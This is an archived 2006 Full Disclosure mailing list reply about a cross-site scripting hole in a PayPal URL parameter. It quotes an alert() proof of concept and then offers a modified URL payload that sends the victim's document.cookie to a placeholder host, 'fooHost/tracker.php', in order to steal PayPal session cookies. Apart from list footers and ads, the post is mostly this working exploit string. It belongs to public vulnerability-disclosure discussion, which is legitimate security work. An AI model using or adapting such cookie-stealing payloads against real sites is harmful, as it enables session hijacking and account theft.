Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: alert()

From: Matthew Flaschen <matthew.flaschen () gatech edu>
Date: Sat, 04 Nov 2006 19:33:08 -0500
Good find.  How about using it to steal the entire PayPal cookie, though:
 
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;


auto113922 () hush ai wrote:

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
outside&voice=javascript:document.write('heh');alert('bl00p');



Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: